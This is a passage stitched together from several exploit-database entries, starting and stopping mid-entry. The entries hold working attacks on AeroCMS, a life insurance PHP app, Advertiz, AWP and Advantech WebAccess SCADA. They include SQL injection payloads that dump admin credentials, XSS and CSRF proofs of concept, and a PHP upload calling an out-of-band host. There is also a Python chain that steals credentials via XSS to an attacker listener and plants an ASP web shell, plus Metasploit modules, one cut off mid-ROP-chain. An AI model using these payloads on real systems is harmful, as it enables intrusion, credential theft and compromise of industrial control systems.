# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example SQL Injection

-----------------------------------------------------------------------------------------------------------------------
Param: search
-----------------------------------------------------------------------------------------------------------------------
Req sql ini detect
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21

search=245692'&submit=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:06 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3466
Connection: close
Content-Type: text/html; charset=UTF-8
[...]
Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1

-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21

search=245692''&submit=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:10 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94216
[...]

-----------------------------------------------------------------------------------------------------------------------
Req exploiting sql ini get data admin
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 113

search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 05:40:05 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101144
[...]

                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>
[...]

-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [filename]
/AeroCMS-master/admin/profile.php [filename]
/AeroCMS-master/author_posts.php [author]
/AeroCMS-master/category.php [category]
/AeroCMS-master/post.php [p_id]
/AeroCMS-master/search.php [search]
/AeroCMS-master/admin/categories.php [cat_title]
/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]
/AeroCMS-master/admin/posts.php [post_content]
/AeroCMS-master/admin/posts.php [p_id]
/AeroCMS-master/admin/posts.php [post_category_id]
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [reset]
HireHackking 
# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example 
-----------------------------------------------------------------------------------------------------------------------
Param: image content uploading image
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116
Content-Length: 1156
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_title"

mmmmmmmmmmmmmmmmm
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_category_id"

1
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_user"

admin
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_status"

draft
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"
Content-Type: text/plain

<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_tags"


-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_content"

<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="create_post"

Publish Post
-----------------------------369779619541997471051134453116--

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.
HireHackking 
# Exploit Title:  Life Insurance Management Stored System- cross-site scripting (XSS)
# Exploit Author: Aslam Anwar Mahimkar
# Date: 18-05-2024
# Category: Web application
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
# Version: AEGON LIFE v1.0
# Tested on: Linux
# CVE: CVE-2024-36599

# Description:
----------------

A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.


# Payload:
----------------

<script>alert(document.domain)</script>


# Attack Vectors:
-------------------------

To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.

# Burp Suite Request:
----------------------------

POST /lims/insertClient.php HTTP/1.1
Host: localhost
Content-Length: 30423
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/lims/addClient.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
Connection: close

------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="client_id"

1716051159

------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="client_password"

password

------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="name"

<script>alert(document.domain)</script>

------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"

Content-Type: application/octet-stream


ÿØÿà
HireHackking 
# Exploit Title: Life Insurance Management System- SQL injection vulnerability.
# Exploit Author: Aslam Anwar Mahimkar
# Date: 18-05-2024
# Category: Web application
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
# Version: AEGON LIFE v1.0
# Tested on: Linux
# CVE: CVE-2024-36597

# Description:
----------------

Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.

# Payload:
------------------

client_id=1511986023%27%20OR%201=1%20--%20a 

# Steps to reproduce
--------------------------
 -Login with your creds
 -Navigate to this directory - /client.php
 -Click on client Status
 -Will navigate to /clientStatus.php
 -Capture the request in burp and inject SQLi query in client_id= filed

# Burp Request
-------------------


GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1
Host: localhost
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
Connection: close
HireHackking 
# # # # # 
# Exploit Title: Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin User&Pass)
# Dork: N/A
# Date: 06.09.2017
# Vendor Homepage: http://www.dijiteol.com/
# Software Link: http://www.dijiteol.com/p-Advertiz-PHP-Script--No-Accounts-Required--i-2.html
# Demo: http://dijiteol.com/demos/advertiz/
# Version: 0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# 
# Proof of Concept:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/editpersonal.php">
<!--Change admin username-->
<input name="login" type="text" size="20" maxlength="15" value="admin">
<!--Change admin password-->
<input name="pass" type="text" class="keyboardInput" size="20" maxlength="15" value="efe">
<input type="submit" name="Submit" value="Update">
</form>
</body>
</html>
# # # # #
HireHackking 
# Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability
# Date: 12/02/2014
# Author: Robert Cooper (robertc[at]areyousecure.net)
# Software Link: http://www.guruperl.net/products/awppro/
# Tested on: [Linux/Windows 7]
# Vulnerable Parameter: group_id=
 
##############################################################

PoC:

http://server/cgi/client.cgi?act=list_zone&group_id=1'

http://server/cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2,group_concat(id,0x3a,login,0x3a,password,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from awp_ad_client--
 
(Passwords are stored in plaintext) 

##############################################################

http://www.areyousecure.net
HireHackking 
source: https://www.securityfocus.com/bid/47008/info

Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue.

An attacker can exploit these issues to execute arbitrary code and gain access to sensitive information. Other attacks may also be possible.

Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35495.zip
HireHackking 
# Exploit Title: Advantech WebAccess SCADA 8.3.2 - Remote Code Execution
# Date: 2018-11-02
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: http://www.advantech.com
# Device: NRVMini2
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-1MDG1BH
# Version: 8.3.2
# Tested on: Windows Server 2008 R2
# CVE: CVE-2018-15705, CVE-2018-15707
# TRA: https://www.tenable.com/security/research/tra-2018-35
# Description:
#
# This code exploits two vulnerabilities to gain remote code execution
# with Administrator privileges:
#
# 1) CVE-2018-15707 to steal credentials (XSS). User-interaction required.
# 2) CVE-2018-15705 to write an ASP file to the server.

from http.server import HTTPServer, BaseHTTPRequestHandler
from base64 import decodestring
import re
import requests, urllib, json
import sys
import argparse

TIMEOUT = 5 # sec

def err_and_exit(msg):
    print '\n\nERROR: ' + msg + '\n\n'
    sys.exit(1)

# WADashboard client
class WsClient:
    def __init__(self, ip, port, https=False):
        self.ip = ip
        self.port = port
        self.https = https

        self.endpoint = 'https' if https else 'http'
        self.endpoint += '://' + ip + ':' + str(port)
        self.endpoint += '/WADashboard'

    # see if service is up
    def grab_projects(self):
        url = self.endpoint + '/api/dashboard/v6/waConfig/getWebAccessProjectList'
        r = requests.get(url, timeout=TIMEOUT)
        if "resString" in r.text:
            json_decoded = json.loads(r.text)
            if json_decoded['resString'] is not None and len(json_decoded['resString']) > 0:
                return json_decoded['resString']
        return None

    # success if we get cookies
    def login(self, projectName, user, pw):
        # issue a login request and set the cookies
        # POST /WADashboard/login?cont=dashboardViewer
        # projectName1=myproject&username=admin&password=hello&recId=
        url = self.endpoint + '/login?cont=dashboardViewer'
        data = {
            'projectName1'  : projectName,
            'username'      : user,
            'password'      : pw,
            'recId'         : ''
        }
        r = requests.post(url, data, timeout=TIMEOUT)
        if len(r.cookies) > 0:
            self.cookies = r.cookies
            return True     # success
        else:
            return False    # fail
        
    def write_file(self, filename, contents):
        # /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=contents&overwrite=true

        # post the writeFile request
        # for some reason, the data is required in the query string instead of POST data
        url = self.endpoint + '/api/dashboard/v1/files/writeFile'
        data = {
            'projectSpecies'    : victim['project'] + '!savedConfiguration',
            'folderpath'        : '../../../../' + filename,    # uploads to /Broadweb/ folder
            'msg'               : contents,
            'overwrite'         : 'true'
        }

        url += '?' + urllib.urlencode(data)
        r = requests.post(url, cookies=self.cookies, timeout=TIMEOUT)
        return (r.status_code == 200)

# This class will serve as an HTTP listener
class MyWebHandler(BaseHTTPRequestHandler):
    def do_GET(self):

        data = self.path.replace('/', '') # remove leading slash
        decoded = decodestring(data)

        print "\n***LINK CLICKED!***"

	try:
	    # carve out the piece we want to match
	    i = decoded.index('logOnWebService')
	    k = decoded.index('readNodeStatus')
	    chunk = decoded[i:k]

	    # find our match
	    regex = '^logOnWebService\\("(.+)", "(.*)"\\);.*'
	    m = re.match(regex, chunk)

            if not m:
                err_and_exit("Couldn't extract credentials...")

            print "\nCredentials stolen..."
            user = m.group(1)
            pw = m.group(2)
            print "- User: " + user
            print "- Pass: " + pw

	    # login to WADashboard
	    if not client.login(victim['project'], user, pw):
		err_and_exit("Credentials didn't work...")

	    print '\nLogged into WADashboard with credentials.'

            # write malicious ASP file
            asp_payload = '<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Done."%>'
            filename = 'exec.asp'
            if not client.write_file(filename, asp_payload):
                err_and_exit("Write file failed...")

            print "\n'" + filename + "' written to disk."

            # execute OS command
            url = broadweb_root + '/' + filename
            data = {
                'p' : victim['project'],
                'n' : victim['node'],
                'c' : victim['cmd']
            }

            url += '?' + urllib.urlencode(data)
            r = requests.get(url, timeout=TIMEOUT)   # no cookie needed
            if r.status_code == 200:
                print "\nSuccessful request to '" + url + "'\n"
            else:
                print "\nThere may be something wrong with the ASP payload.\n"

            print "\nDone!"
	except Exception as e:
            print "Exception encountered: " + str(e)

        msg = 'hello poppet'

        self.send_response(200)
        self.end_headers()
        self.wfile.write(str.encode(msg))

# MAIN

# deal with command line flags
desc = '''This exploit targets Advantech WebAccess/SCADA 8.3.2. It has been tested against Windows 2008 R2 x64.

The goal of the script is to execute code remotely. User interaction is required.

The following operations will be conducted:
1) Ensure WebAccess application is running. (TCP port 80 by default)
2) Ensure WADashboard is running. (TCP port 8081 by default)
3) Ensure user-specified project exists.
4) Ensure user-specified node exists.
5) Generate malicious link to send to victim user. (exploits CVE-2018-15707 to steal credentials via XSS)
6) Start HTTP listener to receive credentials when victim clicks the link.
7) Login to WADashboard.
8) Write a malicious ASP file to the root of the WebAccess application. (exploits CVE-2018-15705)
Note: elevated privileges will be obtained using the Webdraw RemoteWinExec function.
9) Execute user-specified command.

Example (equivalent) commands:
python script.py -t 192.168.0.2 -p1 80 -p2 8081 -https false -proj myproject -node mynode -ip 192.168.0.3 -port 9999 -cmd calc.exe
python script.py -t 192.168.0.2 -proj myproject -node mynode -ip 192.168.0.3 -cmd calc.exe
'''

arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Target IP (Required)')
arg_parser.add_argument('-p1', type=int, default=80, help='WebAccess Port (Default: 80)')
arg_parser.add_argument('-p2', type=int, default=8081, help='WADashboard Port (Default: 8081)')
arg_parser.add_argument('-https', type=bool, default=False, help='HTTPS (Default: false)')
arg_parser.add_argument('-proj', required=True, help='Project name')
arg_parser.add_argument('-node', required=True, help='Node name')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-cmd', required=True, help='OS command to be executed')

args = arg_parser.parse_args()

# victim settings
victim = dict()
victim['ip'] = args.t
victim['web_port'] = args.p1         # Broadweb web app port
victim['ws_port'] = args.p2        # WADashboard Node.js service port
victim['https'] = args.https
victim['project'] = args.proj
victim['node'] = args.node
victim['cmd'] = args.cmd

# listener settings
listener = dict()
listener['ip'] = args.ip
listener['port'] = args.port

# validate IP addresses
ip_pattern = "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+"
for ip in [victim['ip'], listener['ip']]:
    match = re.match(ip_pattern, ip) 
    if match is None:
	print "\nError: IP Address is invalid: '" + ip + "'.\n"
	arg_parser.print_help()
	sys.exit(1)

# start the real work
# ensure WebAccess ASP application is running
print "\nPerforming some banner checks to ensure services are running...\n"
proto = 'https' if victim['https'] else 'http'
broadweb_root = proto + '://' + victim['ip']
# no need to add port if it's 80 or 443
https = victim['https']
if (https and victim['web_port'] != 443) or (victim['web_port'] != 80 and not https):
    broadweb_root += ':' + str(victim['web_port'])
broadweb_root += '/broadWeb'
url = broadweb_root + '/bwRoot.asp'

try:
    r = requests.get(url, timeout=TIMEOUT)
except requests.exceptions.ConnectionError as e:
    err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['web_port']))

if 'Welcome to Advantech WebAccess' not in r.text:
    err_and_exit('WebAccess not found.')

print 'WebAccess is up.'

# ensure WADashboard Node.js service is running
# and projects are defined
client = WsClient(victim['ip'], victim['ws_port'], https=https)

try:
    projects = client.grab_projects()
except requests.exceptions.ConnectionError as e:
    err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['ws_port']))

if not projects:
    err_and_exit('Dashboard Viewer not found.')

print "Dashboard Viewer is up."

if len(projects) == 0:
    err_and_exit("No projects found...")

print "\nFound projects: "
for project in projects:
    print " - " + project

# ensure specified project exists
if victim['project'] not in projects:
    err_and_exit("Specified project, " + victim['project'] + " was not found...")

print "Specified project '" + victim['project'] + "' exists."

# ensure nodes are defined for project
# we have to specify a node name to run the custom RemoteWinExec() function
url = broadweb_root + '/' + victim['project']  +'.dpj'
r = requests.get(url, timeout=TIMEOUT)
node_list = list()
if "[nodelist]" in r.text:
    for line in r.text.split('\n'):
        regex = "^node[0-9]=(.*)$"
        m = re.match(regex, line, flags=re.MULTILINE)
        if m:
            node_list.append(m.group(1).strip())

if len(node_list) == 0:
    err_and_exit("No nodes found...")

print "\nFound nodes: "
for node in node_list:
    print ' - ' + node

if victim['node'] not in node_list:
    err_and_exit("Node, " + victim['node'] + " not in node list...")

print "Specified node '" + victim['node'] + "' exists."

# generate link to send to victim
print "\nSend this link to the victim:"
print "Keep in mind, they could be logged in via localhost."
link = broadweb_root + '/bwmainleft.asp?pid=1&pname=");i=document.createElement(\'img\');'
link += 'i.src="http://' + listener['ip'] + ':' + str(listener['port']) + '/'
link += '"%2bbtoa(document.getElementsByTagName(\'script\')[4].text);//'

print link

# start listener
print "\nListening on " + listener['ip'] + ":" + str(listener['port'])
print "Waiting for victim to click link..."
httpd = HTTPServer((listener['ip'], listener['port']), MyWebHandler)
httpd.handle_request()
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
      'Description'    => %q{
         This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.

         This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
         of Advantech WebAccess. Authentication is not required to exploit this vulnerability.

         The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
         the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
         upload arbitrary code (instead of an image) to the server, which will then be executed under the
         high-privilege context of the IIS AppPool.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'rgod', # Vulnerability discovery
        'Zhou Yu <504137480[at]qq.com>' # MSF module
      ],
      'References'     => [
        [ 'CVE', '2016-0854' ],
        [ 'ZDI', '16-128' ],
        [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
      ],
      'Platform'      => 'win',
      'Targets'       => [
        ['Advantech WebAccess 8.0', {}]
      ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 5 2016",
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'The base path of Advantech WebAccess 8.0', '/'])
      ], self.class)
  end

  def version_match(data)
    # Software Build : 8.0-2015.08.15
    fingerprint = data.match(/Software\sBuild\s:\s(?<version>\d{1,2}\.\d{1,2})-(?<year>\d{4})\.(?<month>\d{1,2})\.(?<day>\d{1,2})/)
    fingerprint['version'] unless fingerprint.nil?
  end

  def vuln_version?
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => target_uri.to_s
    )

    if res.redirect?
      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(res.redirection)
      )
    end

    ver = res && res.body ? version_match(res.body) : nil
    true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
  end

  def check
    if vuln_version?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def upload_file?(filename, file)
    uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx')

    data = Rex::MIME::Message.new
    data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
    data.add_part(file, nil, nil, "form-data; name=\"file\"; filename=\"#{filename}\"")

    res = send_request_cgi(
      'method'  => 'POST',
      'uri'     => uri,
      'cookie'  => "waUserName=admin",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => data.to_s
    )
    true ? res && res.code == 200 && res.body.include?("{\"resStatus\":\"0\",\"resString\":\"\/#{filename}\"}") : false
  end

  def exec_file?(filename)
    uri = normalize_uri(target_uri)
    res = send_request_cgi(
      'method'  => 'GET',
      'uri'     => uri
    )

    uri = normalize_uri(target_uri, 'WADashboard', filename)
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => uri,
      'cookie'   => res.get_cookies
    )
    true ? res && res.code == 200 : false
  end

  def exploit
    unless vuln_version?
      print_status("#{peer} - Cannot reliably check exploitability.")
      return
    end
    filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
    filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)

    print_status("#{peer} - Uploading malicious file...")
    return unless upload_file?(filename, filedata)

    print_status("#{peer} - Executing #{filename}...")
    return unless exec_file?(filename)
  end
end
HireHackking 
Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution

Discovered by: Nassim Asrir 

Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/

CVE: CVE-2018-6911

Tested on: IE11 / Win10


Technical Details:
==================

The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument.

Vulnerable File: C:\WebAccess\Node\AspVBObj.dll

Vulnerable Function: VBWinExec

Vulnerable Class: Include

Class Include
GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE}
Number of Interfaces: 1
Default Interface: _Include
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False

The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command.

Function VBWinExec (
 	ByRef command  As String 
)

Exploit:
========

<title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title>
<BODY>
 <object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object>
 
<SCRIPT>
 
function exploit()
 {
     
     rce.VBWinExec("calc")
	
   
 }
 
</SCRIPT>
<input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br>
</body>
</HTML>
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Advantech WebAccess 8.2.
          By sending a specially crafted DCERPC request, an attacker could overflow
          the buffer and execute arbitrary code.
      },
      'Author'         => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'ZDI', '17-938' ],
          [ 'CVE', '2017-14016' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 2048,
          'BadChars' => "\x00",
        },
      'Platform' => 'win',
      'Targets'  =>
        [
          [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31',
            {
              'Ret'   => 0x07036cdc,  # pop ebx; add esp, 994; retn 0x14
              'Slide' => 0x07048f5b,  # retn
              'Jmp'   => 0x0706067e   # pop ecx; pop ecx; ret 0x04
            }
          ],
        ],
      'DisclosureDate' => 'Nov 02 2017',
      'DefaultTarget'  => 0))
    register_options([ Opt::RPORT(4592)])
  end

  def create_rop_chain()

    # this target opts into dep
    rop_gadgets =
    [
      0x020214c6,  # POP EAX # RETN [BwKrlAPI.dll]
